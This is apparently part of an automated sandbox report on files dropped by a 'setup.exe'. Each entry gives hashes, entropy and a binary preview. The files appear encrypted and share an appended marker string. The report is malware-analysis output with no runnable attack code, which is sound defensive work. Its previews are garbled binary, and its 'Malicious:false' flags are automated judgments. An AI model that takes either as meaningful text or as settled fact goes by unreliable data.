              SHA-512:8A1634A2F77260DD25C68BDBA3825F25C1698C11165A0D5DE7891FF26102C45458DD778F3B5F0B46C57482C5E8E5E56010923E3B25FB8823F977474CFFA9272E
              Malicious:false
              Preview:<?xml..g6..lGx:..I..........._.l...th..I+.nq..V.l]T.#e..f.@E=.;YR.....>....^*......$....]A8u!P.X[..J.@...r.........7.<.9l.j..*.....Z#.....=.9....3....x.wg...Y.Y....^....2.V....g..*..F..g.6.xt!5.....LM...y....l....E....ls..K*..g...&).......i..1..[..ce.v.I;..(h..9.Ef.x.N. ._.......~.''/...a..Tz.E.."ZW..i.+7sL.$.C,......8...gj...z.z..9..x.r#.yE..[.{........>.....k.E..fj.....P._.A..8Z!.p..Rx21*...@..C.@,.......y...e[.b.v..*........H............^....e..|..w.cKl.:..l...V.F].A.z..k..T.J5A.`..y..lre..1*.t..._....A.i.....?.^.L...0.U....b9*$.. .....V........<..;.......V0.`.+HZ/.....3Rh......_.,.......9X.Pb..j...;...33..l~.....9u......lT..8p.,....\.q.F.W^.z.aa.3~.%`~H.k.B.....#...r....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1029
              Entropy (8bit):7.814424176971098
              Encrypted:false
              SSDEEP:24:iDJcjT12wqQgHCHM/iGg+WFoKu0FS/4C0BagvICqD9YbD:iDe17eiHwDgDosez6zD
              MD5:EB13870B0FB4AD0245B2C2FE08C42928
              SHA1:AEEA3F14C8E36109B3CE9C54FCB2AA5AB7067B34
              SHA-256:3AEF3F811C439390FFA03B0215FE6ADB2B421F5216AD287F27F96A8EDD6574DE
              SHA-512:8347B8FE3A987A9622A024EA0CCA7C1D21E95230A34E43A487F6EB2A0E242EA8FBECDBEC6FAA0621818692F6D1572595641818A05A534AD6EFF6B8318296E109
              Malicious:false
              Preview:<?xml.5 I..*fE...t@....=.6e.....6M....*..u...]v...Qp..z.M.7..h.J.w..u4I.$.mm..z...,..wF.;...%/.[...4t..B...%.?.....Z~.....-...R."...x.EB.T...i.VF../..wHJ|....B...o.v..'....{..r.....!.oZ....6..s>Pp....}{.y.S..h!.R.......b\a..L..:(....YS.B.oe.Q.....'*vw7.l.j..p..-...........3.].S./.c$]P.ES5X|#..%..'!.,Z.\r.2..1.C{...j.+b)K......X/ncQ..V..,.A..n8.(.c....^*P..u.vm.2.vF].K.L..<Q-.O..........'.U".....$z.G~...t.1O.rw.Y6.T+.....fp"=.%....j.y%D..e.k.I....V..`..SNn;....F-..V..-......<T.....W.c...s~h-&.a.......M>t;.4. ..M}m..4.h.e........<.HW..8[.NF......Gs......G..O+.*E.0...Bst1.W....<qb.SU.......ix.G5.^2..}.@.J...k)}~".V.k.0.%j....r..=......@n .Y.FM.k...[...j....9.m).,.@..x...\d..M..G.#-....y .m=[..g.......'7...lb._.%.Y..Q..,.D..JY..'...r}.2.[Z~2k..9`...[..:.....V$.......-.A.'6Q.1....v'........@N.w...r...;.w....wu.=...:o*.Uu....?<...6...te....._..6..6~......I.2!..-...P...Rw....;./.../g.[.o.n.....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):871
              Entropy (8bit):7.7809737043916805
              Encrypted:false
              SSDEEP:24:ifpwclTtObjc70/cXwYLGJUOHn7WqYjbD:ipJMbY70/CjGJJ7WqY3D
              MD5:3CFD68BE7B9944E311864270BAAEE000
              SHA1:1B74D2744CBC6124A7C174F46514D1B24F88EA57
              SHA-256:039D612217B2020AB75243B26244810CB0CE9CC9EFE3D999F879ACE0B987FB49
              SHA-512:1BCA7503D7B3C9842506B1D5BCAFE4EAF4966A5EB2EF7E02C861E47F8E80BDA1E4865C746A09C63D8B29C59B5E6409C595CC7EA01A0CD5E0689F34FA8801A9DC
              Malicious:false
              Preview:<?xml.T.]..v.t..zg..g..)d._Ig..HC..//.z....7m.lw..-............#-..-w.9..-j......v..4$..5_"......b...X./..)...f.G.....3..u.:..-.B.C.~Z.R.z@.m..E.c..y..t8x....l.p..X..+k`t|d._.V.6./O..U.v.O.)(.o....&..6......pn..FL...G+..`._~.<9#e._+.f.......l..,.,........\......d8.F.?..{pPy......1.G.+..(.a:.p:1$....c..V=.T0"...#..t.;..;....5..=-r.)}'c.^.#........9.B.....lH.P...SI.X..|.&<7..R:.H.'......4....U...ozl@...G..=......M.).....I......<j4...X.[s*cG......h.5Z:.....'.N.&.x.l...O..{g.j.st..!W.m.$$.^G ..Ld...@..Vm....~GY..$.j\U.,.;*...dU....:..'..(g.....ZDi.............Y6G..1.x.4..........?W......`....uY.....;z.i.X....*qsr.t>.F.2..7\2S=i...B.`....+`...n....X.Q.{O%.w........].A..s.e..%U)...)..| .....nM.]..k.w..G.j..;).F......9...i... .8......6..U..s>...".@Z<VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2217
              Entropy (8bit):7.911809692165027
              Encrypted:false
              SSDEEP:48:fvIwpnPGWWu4qf/9L4vD94HrOdQGcfn6v6aPBT/MSmD:fvpRMux9L4fdxcfNaJ/3+
              MD5:4B9BB838EBDA3CE0B638979AD929EAC2
              SHA1:2F1B6B4E7EC73FB4ADD25C2E54225DD16ACA55E3
              SHA-256:D4A4CFD2FB3BB23BCCFD9DF5C799AAF8017E9993C68CD5AF92DC38AC5AE91D9A
              SHA-512:DF80AF49F4A7D561DF5E568CA8F3DD1B8AC08589590E7275F5D4292942E503081A5DAD9CABB03321B0EE118D667F757133A6FD0973F8EC53009CE57FD453E4E4
              Malicious:false
              Preview:<?xml.....Dp&..E.r.*9[{.....<..V"a..P....u.........]&....+..N.Hh...q$w ..#.'......;...m....9t...{)...=..s..[.H.R..4...0...............9.g+ .u/t.^.u.s3.J.L}f...X.4...DU.?..Db.4.j.P'......b.........t!...i~..oQ.....@..T.].u .....}....e..P].q.=?.E.. .$[p%.tQqR....x&.T;....."...x.cV.W..t.N..|;-*Q.mA..-..._....)XI.T.....V-4.Y.O....vI.t....(M....tT...!.^.0..n....k..`...$..8........D.".....U>.......G`L.|H..YA...=)...q#..#,..g...;..|.n.h....^>.+r...T.Q....C.$Y......g.DC.M".....K.. .L.hxm..p|UA..dY.L.:...NL/...77.*.u..:.l3..1..N..n$t+.@......[.r..>r.=.#..:.......W..{.(........tBha.}..eR..........@0N .`.....p....[7.....O..v..7g.....o..=.F,...R.....Ij.@m....?....r.:.6..j....^......PU..|.h..S$..8|e.&^Y..&.W..\..<..U..?}if.b.X8..c..&...=...q.G2q.."|.p.pD.1...L.6..o.q$....t..)t...S&j'/.c4B.0;.<....)..37.......6..`..Z.#..=/.ye.f....._g..R..D..k.g=./.+jn..G.He[..>...&7...5..J...v#.^=..u..K.F.cjKYY<..[.Z"q....R.Q........Z!."a.,...0^z.....P...1......q.a|..w..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1987
              Entropy (8bit):7.904458746726005
              Encrypted:false
              SSDEEP:48:yFHexMm+MJy1/Gw+fMqVCZXr4N2KopEpPnD:yFHeb+MU1uw+zsXr4N2ML
              MD5:C2662F7033C5CB52259882B90F12F252
              SHA1:EB206586BEBA88EC0309191636665477B13FAD26
              SHA-256:1B763500ACCB2EB9DB38D5237D38524CA36F339F356D27A78A71975C24AC35D3
              SHA-512:6E8950D83209993F074DBD287F5EDEE9CFDBFD4DEFF490015788DF91C20802FD8B5FBF363EBB9049FC54922AC15C5B26F03BCB6E6D62ACBFD1EE46201B5D1B1E
              Malicious:false
              Preview:<?xmlf...n.ro.iM.....{...5... .N^...'...............|l^.......*|x.aCd.......X.+.........U..=.....4k.ti.vFo......&.?%..5..8n.......9U....{.....HA.h.<.u.PY....X....l...7.1.t....!.O..5o...O.<.>.K......8..QS..!;.....G.b.......`!.nw5Y..si....X..S....[..=<....2/w.j.$_......4.Dz.....o#~.L...eR.....&.....7......?..../.L<.,.'.....~.+.ql.......`\@WU..sh..../L....E.'.3.4\%....g.3...M..I......y.........l.u.N."v...QC.m...8....%a.."......F;k9.g.:.CN^G.J'....N......A.RR}...%...n..%Q..q..l..2.)(XG.a.........#..-.....a..0E<.sA...2(c.......`.\tu Ywb.]..=.1....E.Ro0...?Lb...."..0v.I.....=N...}(|...5^.&t..=.J...4Sy..*..&,.)K`m.....E$.|-.+...p.aF.......q..k.MI..Z-.8t}(U..V..8j..\...A.U./W?.X......fB\6.CE\.|.u....TU....z1(G...D.M....J....+...iD.qR.....!..B.7.;Q..hL......7..^`./............EE...r.2.{................j|=..7k.LS.....72C?.S._@..G.;.o........3.~B]........9.0O7..Z..3yS.lp....%...5v.j:......vw.BF.O.;+@....Gl..]J"2....)..m.A..7Yt.V.Q..j...?^.u.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3851
              Entropy (8bit):7.949068207600913
              Encrypted:false
              SSDEEP:96:iE+WpjF68tv/kqnVTSC+HzDbz+6Z6dXBgwR55nBcMiKrILR:iE3pI8tv/kCTSCGPmdSwRJxiK81
              MD5:1780F4AB3AF110A8F24824BEA59F97B3
              SHA1:0FDB7185BF7CEAC31F85F3F4A2C7F2187E5BE197
              SHA-256:4764CD87286FD5A6CE09EA44D075374F735BEC46D344D7D8DEF395A3B64A47F4
              SHA-512:790B5667E3F5FF585C8E8554AD44AF1A4807BE69764013438820B277985A4144359C2C92179D33107354E1FBF5D8F59FCC6BE3E35C8BD54D81808CB1AA4B8A5A
              Malicious:false
              Preview:<?xmlp.G.{.-.J...w...fV..9.dx...N.8.......$.n.K.G.n.....G6W...wlXy..}....Q.zn..`.!...P...p%.10..\p.f..O}.ows\..`...L.m...R....=..G...U.......En..c.-..#...........<Cf.w...n.._.1......D.....}....m.x.....).B...7..%.3$.`..W5..(g].J....i+.^+.z.....o(..z..3o...8.Zx..#f.6.s.P.O..*..F1&..2ZB\........t..g%.....>(......x.8.A....u.uI^..]:$.D:$..6.)..')).$...........f..*..L..<....\=.......= .n>....b.5....c...i.4..A......fSY>.JR..o^..b2.w..EoR&.?....q...C..9......p~...z.3.Ow...L#,.S.!..m.'...*%.....sh.=.......{._.K.Q.a,.......n...|..~...%3....f..z,..2."..Y......G..8I0.].z2...V.0.Z.......(.\....2$.R.a.@.b.$..F=..<y./.A...<.......^.M,.]...&.6.W.0,..X.CS.j.~.S.,L...1.&~o..-#.`..J6..I....a....U....{%.Y,..l....Z"7......&..Y.U...J.....gN.P........Q.....'...... `"...E;t\/f.p.K.G...D. Y....tXk...b...#%..k1{....&Gc=...F..1.<3.Pq.T..7{..t.P..-..EU..\EZ..me.=.1...,Y@...x........60?.[.."(.!.Z%..A..:7.....`.C.g..T.j..b..gx..-L...@...:...^+*o.X.W......
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3223
              Entropy (8bit):7.93470910744076
              Encrypted:false
              SSDEEP:96:0aQuDcsjqIhGFmvpq3F5U6jPmD2oHMDr0ntqR:BQu1jqeZBwUqXoM+IR
              MD5:6A5EE848121795086A1EB0EA0DFAC2DF
              SHA1:8F9CFF34302537222E84ECC3737D43DFFB638562
              SHA-256:343FF8831CE45053E6233A3DD848316C1AECC75ED0E8DE25E02B2DFFF9BC03DE
              SHA-512:523350AFCB1E64AD324B203BA36874AFC417ACFADD4FFC1DDB91813119B210A357FAA8FA5C36726A821B7323FFE784906E862B57C84A49F5743C77EED00B5148
              Malicious:false
              Preview:<?xml...Q...i(.61...1..u k.o.B1...]......&...Pf.S.._.7.YY............?...E.(.4..M....~."'k.].5.$.g.jk\...?.......Ai...von..Y.....P]...Uv..N....}.:.Gq_u....En".7..S2..4.d%{Wa.V..K...E.NA.)M.Zx.D.*.$E...,....K..,...G"m.X.......S...2..b|.P..".tk..n.-...5.??I$...{.'.c....'.Sh.ID....?@.~......z.3J....w.X330....;..W.I......Y*..d......U}........a....d.;z../.rr.$...k..PZ..mD....B.>.<.4*.<i.../xd.1..*n.R...y.[..r.+......&I...'.GA..V....v..V......~.R9....G...)..Z;.c.K.j.....l.....1.Z..T....=x|E.d....:$...x.o=q.cL.+.`..Mm...#.Bb...2U...C7.i...`.a."%A...n..6Ei..-q..|..a.>....,...*..........8q...x...e].....6=\q..h.~.....(.c5._V.&..&+fW#.){.a?iT...6O.=p.r..J8.....ca....O!...y.g`.T.....Sj.w....Y_.#.G....~..q..?....-~X....*Z.w0D.}w..Z..aR[....c.......C.J.v.*.....P9Y......Z4C8Y.....mC7...T.h....G..sC..w!M..%RD.....:.`..7.bk...;f.Sp...!.....NNA.d?M.....k.f.5.B....C**.6..m...N.\4...I...V..o. ./....:....'..r..R.w.n.L...l...T..6.>f.@0....h.s7oT...c.t..UC..|.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):871
              Entropy (8bit):7.748473450974185
              Encrypted:false
              SSDEEP:24:Cz4Vq+Vj6VHLvVgaaL17GCfbt+ekIzJe4HKLHdbD:MQegaaL9zLJvqzdD
              MD5:ED5AF1D9B3B98FFD68A34E539FE9F6FF
              SHA1:AEF2A451D9FD31A91947D6565DB44E2CF56BBD76
              SHA-256:05130EA6C7224C5DC6AC6306BD06426B16222F73B26185D36BE1C90356E67359
              SHA-512:58655485E39204FC5135075A1A17914D7D38BCB5C1F8B47D1CF9B3DAD041E8224165B5B1E288196500BCD210D5317C9BCC986C7759F859105776E8501A52F494
              Malicious:false
              Preview:<?xml......l.....*..B......$....^..8.pk.t...p."..K!o..O;.._..n.H.pb..:QH..:.....{.P.G...B.......I.P...!).....a...%_...y.).6.u.....R:.......qS+)..y..@.lM7{{eZ...S".....+o.M.U.%.;_~T^..i...,...3...*.a..z...)..;..}..U...O}.x..$.I..e.pY...;...!.I.j.. .d..3g.AP..\VS..uP.....#)w6*.#..#!.z........W#.F.d.[..c.L.\.{A.6<..@.^...z......]...U...+...-F..........da6"m.{.P.{..1......j.^.xA..$.%sk.(....H.=..G.+.`{.D..cig:...`Y.}.....|...YG......-..W...kVU.JP(WP.!3..........U...J........G.....Rl/\...U..h.i....).........c.g.9.$.p.o.'.b..kt=....i.{.u,.....M`V`.t..$..`5.(F...-...Y....LC]v.GU]....f..~g.......1/.Y.%....G.V...."Q@....9*VL;...v..6...|..s....M4MDp.... .'E..j.=...\.+R.s...<C..j.......OQ.%..0-MF8%b.r.rU.{.......Dj..{E......<.L.|.%..F[.y.]..uRG|.(....~...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):866
              Entropy (8bit):7.76105676899469
              Encrypted:false
              SSDEEP:12:H+0pBY3Am64DABTwfZgUiOpbFgjiyEvXTGPh+t0e1M4Mj0/VNZnotY6IZbR4pisV:Y3Am6vBTwm/Opbc4CA050/ZoO5bR4dbD
              MD5:12CAC1FBC760420BBA4BF661F9C45D4C
              SHA1:DACA36D167A78E9E10A97CF27E8BE30830DC4996
              SHA-256:C7CFCDD8AEFC47BD5DAA49338947F302E9F447DE200D2B38F08EEB02ED0EA65F
              SHA-512:7BD670729D74B3B329626F4BF8F00C856FF5B7D97F011D6E27261F40A8EB9E830B8C2C97FD0584B8F761BE571502878603FB119553FCDB1B441856438783C5EE
              Malicious:false
              Preview:<?xmlsi.j..?.....,|9................a.|.m[.NX3......m.M^#.S.[.s.?....g)U$.....i....-{/.0Y.....BW..3.....a.M......Qx..w.@..aO.)....F...}.....qh..-...^ ........V...m.....^]..l.m....u..>z.R.xm|Oz&{F.1QV.O5/,...B....&....n..\..+.h.?Y.{..s.B.....y.c....-...>r.,p4.........d..V.9..=y..Fp.1;v..d.I.]E..Y.k.2...........O.IG#..'.......2.}.h+.....WY..S...'..~,.N....?|Go......r'G...=._|c...*..|.....a..#..^. ).(3.k...Ps...I..&!..S.1...Hv....t..[.;.....!Y.]..H%....'....1..@~.........H...p..^.:.-....OD.-H.g[.).$..s2#.f.P..{........e.....8O.@..|....D..&.O...0.boU.0...[.Y.ns.ZT.h........j...?`)>:...`.Q9<......-.......!.._=..i..n..?...kE.qXI.q...4.4....6$..S...e>..Mz..o..~..=?.Y8...z..?...b.u..]..F...6.KU.Q.i.`...>$Tb@.$._,...........^.4.2..d.~.}....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):860
              Entropy (8bit):7.746523690126993
              Encrypted:false
              SSDEEP:24:DeOjutxI7DjfaLx7ZBetegB5MH2nO8KHwmaTbD:KjtxI7Had7fePE5paHD
              MD5:6BED399C0F12D8046B8449CDFD4432DF
              SHA1:CB4F6CBF66667210CDE0316F354D18C584FC3DEC
              SHA-256:65E9237CB691D6AA5DC41269A6315AD855BF6C3556737DE913D56A90142CD398
              SHA-512:FDDF2EDCCAB4D949DE0A18704608EA17DC83050090B5B1D9579617D5884B241CCCC351813E6BF177F2094E8551E405D651BC95E772929B01283DE05ACBA79670
              Malicious:false
              Preview:<?xml.0.K.>b..]...1...E.....J..f..."...F.........h..j.........swQ...z.9.....%...7O..{....,.v.?..8k.l..%"..?.*UZ...B....J-.W.;....z\.=%.].-./gKt..Ur..G...y..s.....l|*....Q...5E.Q..l.g1n.m..t.m\&Z.m....._...f....R...H...T`.pSs2.G......g.r.w.-.J.88.i.&...>..f..R$..Z!....9....-..T3..L..2...2.@_...v..,..|...I..H..Y.o...R...z..b..%<.>=..O.5....g..:.....pJ....6.F.i......B.UJ.6p!...>ps......*..V...2b3F.$. #..K..[.MA.Q.@~......&.u.P.........B".......@U..9.w(.K.(."V2.tc5..`....I........Yt=2.Z.R{g......k?.j...u`.ON...s..U..R.4...D....s....C...........DE.T[c...K...Te.GU]..9h3vM.K........:>@UA,_*j.}.Q.[&.%@......]G..b.}i......N.L.Q[................F.A.pSc.../_.v.b..KW..|j..('...1UK..pi/_.O.(P...4..1}.e/..-B...z...X.:^.S...|.Gr...n..J.u(.e...qKfVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1057
              Entropy (8bit):7.7838004977632895
              Encrypted:false
              SSDEEP:24:gEpy5pezNkFeOZ6QtUk/eWEi4mo6qYGJKFcg5HYbD:gEpyDehcBeWEi4mo6qrJKFcUHCD
              MD5:DD7613FC0497B90D5CF44802D9EF5B48
              SHA1:8ABFB108060EE348D072A06AACCAC26040B70AE3
              SHA-256:F40C7BAB8596DC9461A6EEDF5F3EF1BF9D44A3DEF22587DB963F31B527E00E56
              SHA-512:D0AA3C98368CDA44434D844A2BBB798D844EF09D93B49E348D268302E4B5DF1E5DF4C6FC66888B4E3FDBFD2E377B1EB9CCEB30AC03FBF6041CC725A2B12AB17E
              Malicious:false
              Preview:<?xml..d.G......h.........0j....(!.{..nY!y&.b.r.....TbK......S-..W)........:..h\%D...=5.9e.;.?...EHw...3.y<..h.Oj.....(j.. .+.37.S..8.....'.y.......Ag3...3'..........9M......Q...;..L..C{...n&.."..........=..K...N...N.]B.d.._.?W.8.b]@cN../i.....F6...\M.JkT..Ra.8..Y.'..>M....^\{......j.5...Fy.w>..F.r.Y...V..7:~.\.y..........TZ ...?.-.a...f....?+.G0\V..lq..M..8....c..(..-.WF3r......r........k..r.."<.....X......9F..pG}..%.....!`^..!......2s..F....RY"9....p........Hm...A...W..mc..G..o.!.lr.[.....:.9..kdC;...d.\m..y.=..E%,.......y]CaIt..?.@nb...V/.........xK.U...35...A.I....5.6..........`3......5...[.....q.. O.....a.f..............Yw......<UKX....;N-...uEIO%.....1...:....q;.^K...a.7..N..l.K.........\c..a..#...^.....tGP...\.@.)S.....9..:.....3;U...Z.N[u.Y...=@.N.....D.#$.....-.#.;.._...... E.#RK......y0T.hF:x0.....3u=..V.....&.........2.a..X."S.^q....Uy1N...Vsxq...7:.].b.B.N.[..I.u.3.UMO.._.......4lA......v.........D.e.9..>9...VrBq0iLIRHjQLgVRLsN1W
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):766
              Entropy (8bit):7.704101531140802
              Encrypted:false
              SSDEEP:12:7yWFYFs4nURVicm2++RPrcHySXSso9JUA30CygkJHeNIYOLhsMR2cii9a:r+rURouNcHypsEeA30oSHeaYhbD
              MD5:490E97A6739C7DEF30225332979F2934
              SHA1:C7C333E39D4192FA0E325E5766930932FF7B7314
              SHA-256:4B690EF83CF9F2453E046B45C294863E9C51F14424CEDE648443F359CB4F8BDA
              SHA-512:8A7C119573A9062652392D5AB4693C45BFDB70CEA1675EDC39CF3934B6E98BEAD290945FA8FA70DFBB38DE741EDEA46FE649582A500024F2DF45832A4DBEEB8E
              Malicious:false
              Preview:<?xml.X...{....a....g...fU..Y1..<J32......;?...y.i........z:....3.f..>~.*...H...=a!.p.pa...[.W1.uH.....$W*I...YQ...x.O._........."...&j....?...N.I..*....A.F...i.. ...{..H|.3E...../0R ..........Tl.RiC0y.m./%..{~....!.0.k^XO.A.;.....I..2..1X...X..3.J..=D:T...v.(.G...D.Cxtb...i..swB.....Qh]..zC.hT.s...Q!Xf^...v......c....IJ.._...O:.NI.G.....h....27`P.,gM_.W(..]Fiqi.&kH..*.0..&..S ..-O..=..2k.,..oz.....i...W......*.G{tB..v...a<E..Ld.....V.>..!...7........q]....$.%.E0...E.)@.fj..~.........h.<.N.............BO....>Q/..(.p...4E..,F.,..*.+...b{.....O3......kt.'3..R...4&$n.&..E..?..".Uq...K\..p..Sn..'.3.......v4.;...J.[~Q...T..:.|*W.Ok.2Wi.).:.@.M.QZ1...`.W......VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1037
              Entropy (8bit):7.816042565093137
              Encrypted:false
              SSDEEP:24:jDZzM57sIMxBYEEgtrhh/yUFNz01a9F2ZbD:Rm7ZMxBCmjOaCD
              MD5:5B5FE46C52820E42E8236D586EE0B6DF
              SHA1:A279414AC230230876FB4873271E3FFB3215A1A6
              SHA-256:134C096DA1398A9407B9954AEC9B242FA8D42CA8F8EFD5B7340C22FD75FB7210
              SHA-512:E33317D926AEA996FEE19F3EF6FBD9662C498F31D40DD40548615FEC404940697AF60F4717A72E7C7411C674A39284E939B9842908278225B3DCAF54365FDE8E
              Malicious:false
              Preview:<?xml...q..(.CRI.-;..|W.....l....!.J...l........:r.BD....).vA...6{.b....x...{i..r...r.>P.M....^......=..P=....s$...u$...<,.4... ..G.....fR8`R....6.:..^....2....Y.......=.."...5...}....-w"....$......b.8...b.i:b.S}D.;.....{E...#...1...cu$...lO.v...z....y(.../G...6.....,.....x....9..$h..<.~gnu'.H!...^..i..G.dq....N.?.[..x..P.\..9..L.4...us.9.oWv..^.7@.J(..<.A`.`j8.Q#2.MR.....j..W..1$.p...].....$....k..S.......:.....X,8..X...6l..e..s..r.].......V0.....m..M.c...I7P......S....'.........[(O.B..........|.L.).\.....8^1......s...dYg.P.'>w;>.b?...K....... <..2.....iq..!.b.z.......[0.MH.kZmG..d.'bW..>...%....#[...X=*.vI....?....O6....mw..(..6.d.Rd.\.d....4. ^v.I..P..F2...c..Z..U.n3ZSqc ..:.+...`W.o....z.z\...j..;D.P..p b.X..T...`l..O.}....lJ.[g..Qh...7W.2h.g..4..L(M....aQ..IB...4nF+.... 3$u.J,(7.H.23.E.<.Sd..Q..k...0...Ie..).jE.J....j...<..*~T..o.L...>.Z.c....T%pH.."b.$....cn.....j&..<....-B.........m.6s!a. ...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):920
              Entropy (8bit):7.753230749975609
              Encrypted:false
              SSDEEP:12:SiQ6J8y1Q6YkTaV3u/Uwa38uAmCCngcbAZQZMGtpOZm3sYvd/Z/ZZlS9e5O8rlsv:Si1qZJ3jJngrK1tpCIs4rZiCJ70dZjbD
              MD5:2CBC186D026401518D69F2FE8A042C19
              SHA1:D411C725900B5418E78C9694675922B6C24D285D
              SHA-256:301C9E556314B06B898864C95D7281B862AF8721BDF1FF70520CFF7E9FD6D70A
              SHA-512:1EE9BADA4575CA4C9AF26822E1C0667B502D1C2803B0FCEE3C9988A031C590980A7A3B977F5308136A999FCF5C3294A704B3356C7B129677B5EB23C6DB84E387
              Malicious:false
              Preview:<?xml.'...W...C.I]...6_.Y.....4...j....e:I...z.L.-fi.v:B.P"._?....o...:....+....`5....x..."-qg..r~..`9..n..n.jpK~2..ByL..!.,.IFm...".8......e.....4r..Q....R..zY.f..+...~.....^.z.!....B.K*...E...4 d.W..q.8..gd......e..K.9n9.`l...t!...;.t.@G....P...k?...gI.P=...*...1..0.A....W....v|;...(...P...mU+..~FhpEq<b..)..DHiS..2u.+.$..n.W.]q&..%.i. ...Z(RG......g....y..E?..x.;.V.-.<C....k.y..$w>. 6."D&4U......oV..*.|.ou,A.S~L..t(.Cb,.[ ...B]....U..#u../P.6lC...e.D<.n..<[.....AS.j..U...<N...>-[.....-.1.....u....yuw ....|.*.}...x"h....=E./..or...q..O.v.ur1....\.S*...5.K.;C.[n... 8N..=.C%.....e+.v..D a...Z..0.u...fq......N...m]..(..kt.......=x....?C|' j.X.I.xR.F.......e.......4..'.......E.=-.z.......1...'.o...;.Eh.....!..U..d.Ps1G....rB.z..S.ey_!..nz....H..Ayc.m9...<..r....pZ^h...R.k...._0.p2.z.J.12....c$.=F......VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1147
              Entropy (8bit):7.817737561456255
              Encrypted:false
              SSDEEP:24:YIiOuKauA7KX+UOXvBnTaPNQ5VRtqpqmzrh5v1NNwbD:ri267KuUcFuPNQ7qpPNNqD
              MD5:BDA9B5C58E7641E3A0D17D40A229ABDC
              SHA1:F1E5E75E754CB8CA9C7EF0EB095EB5B30CC796E8
              SHA-256:22FF1501F8A7D64A29058E3210EFE73B642A761C076635B6085F041ACE841DE6
              SHA-512:1D314DF20C33C63485E1937D209B237CE6AF204168F577FD067C1EBA5F5BE4A643C494251009D52B85E34220DB659504D9EE8D2FDC7383EB9900491B6C3F8E16
              Malicious:false
              Preview:<?xmle0]..*..;../..?..&...+I!.U....r,.....x.`......j...gh0...}-G.2..C9K.b.5..X........^.}.o....-....t..Q....,.O.....jF..iqc...y:;..^..D...<...7.;6.E..d...]Z.,............;.k.....(e...C."..Q...~ZJ...bJ..*Wi.....e..6..5...j_bYc..n..P....]..=6.+..R..F....g>..0s..2...wZ..&...h.F>%..u0.%Df.,.O...P.?:.E..s.x)..Q....a0...*S.?QG..^/O<.......|}...F[f)Q$....y...&.Yd.....yf...m........b..C....4C.5.....$....Q|u...+.......S......*......)x.}.&....g$YF.Nk4e.h8....m)..,i..e..O..S....]..(..;....6..r.....?....~.".x....%{.".mvs...q..MC..^.!.Qn.v.>......e..W..>.hQ....C....d..r.}..KY..k.`....)K..O.....].B.....O.a.O.oAx....Li.P.,.c........6.K.GJ..L2A.S.M.?..Un.b.B...."\..&C..)....1...tPx.P.]...b....J..-.+.U..}.Gk#...Q.(..JB...\...p..=.qa.n$d.Vt.)6Od...<.u0.q.....pY.d.M.%.....5..<,...W.....f.Q..@..-.I...P.7...Z.i...a.d....V...j^|..s....)....(k....V..}..Q.J...g..#...{....G........B.i....c.Bl].. ;....g!.n...5H...[.W'......Y.O.D.6....6b..t.kgb..zMO.hx.D.:
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1141
              Entropy (8bit):7.80329876210423
              Encrypted:false
              SSDEEP:24:bwbBG76M1mB+q/zvT72406rqu4e5S8dU30KJ8MLvv0jJMOA5w85SbD:b+BL+qLTC4HZ9S88lJ8MLn025X5AD
              MD5:EC542664D8CEDB6AC9C80E3893FA2ACF
              SHA1:86E7848676110A77E07DEF8F9EA474A58612AF91
              SHA-256:D5C1015555F644703673F42BBE0686EF0AA6A4CCD1F27065698EBA5FA3B0E0EC
              SHA-512:0E287B7AD8AA19AD627D21D7D4BD830059D6D9794502236D49FD59741E991D996D39E454934C2001BB5AA86B09878F33A05B729D30BAEFF939F070FCB6FB1F2A
              Malicious:false
